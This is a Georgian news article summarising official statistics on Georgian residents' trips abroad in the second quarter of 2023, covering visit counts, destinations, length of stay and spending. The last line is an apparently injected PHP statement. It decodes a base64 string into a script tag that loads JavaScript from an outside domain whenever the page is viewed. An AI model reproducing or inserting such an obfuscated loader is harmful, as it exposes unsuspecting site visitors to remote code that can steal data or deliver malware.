celsiusi
ავერსი შნაიდერი

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2023 წლის მეორე კვარტალში საქართველოს ტერიტორიიდან დაფიქსირდა საქართველოს რეზიდენტი მოგზაურების 697.8 ათასი გასვლა საზღვარგარეთ, რაც 35.4 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. გასვლების უდიდესი ნაწილი, 47.2 პროცენტი, განხორციელდა 31-50 წლის მოგზაურების მიერ. აღნიშნული რაოდენობიდან საქართველოს რეზიდენტი ვიზიტორების მიერ საზღვარგარეთ განხორციელებული ვიზიტების რაოდენობამ 543.6 ათასი შეადგინა, რაც 33.9 პროცენტით მეტია 2022 წლის ანალოგიური პერიოდის მაჩვენებელზე.

საქსტატის ცნობით, საქართველოს რეზიდენტი ვიზიტორების მიერ საზღვარგარეთ განხორციელდა 331.7 ათასი ტურისტული ტიპის ვიზიტი, რაც 50.1 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტების უმრავლესობა, 49.7 პროცენტი, განხორციელდა 31-50 წლამდე ასაკობრივ კატეგორიაში შემავალი საქართველოს რეზიდენტი ვიზიტორების მიერ. ქალების მიერ განხორციელებული ვიზიტების რაოდენობა მთლიანი ვიზიტების 46.4 პროცენტს შეადგენდა.

ამასთან, უწყების ინფორმაციით, 2023 წლის მეორე კვარტალში ყველაზე მეტი ვიზიტი განხორციელდა მეგობრების/ ნათესავების მონახულების მიზნით. ვიზიტების უმრავლესობა განხორციელდა თურქეთსა და რუსეთის ფედერაციაში, შესაბამისად, 236.7 ათასი და 79.9 ათასი ვიზიტი.

საქსტატის ანგარიშის მიხედვით, მიმდინარე წლის მეორე კვარტალში განხორციელებული ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 6.0 ღამე შეადგინა, რაც 2022 წლის მეორე კვარტალში დაფიქსირებულ მაჩვენებელზე 5.4 პროცენტით მეტია. განხორციელებული ვიზიტების 97.2 პროცენტი წარმოადგენდა განმეორებითი ხასიათის ვიზიტს.

სტატსისტიკის ეროვნული სამსახურის მონაცემებით, 2023 წლის მეორე კვარტალში განხორციელებული ვიზიტებისას გაწეული ხარჯები 514.3 მილიონ ლარს გაუტოლდა, რაც 12.6 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტზე საშუალო ხარჯი 2022 წლის მეორე კვარტალთან შედარებით 15.9 პროცენტით შემცირდა და 946.0 ლარი შეადგინა.

571
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");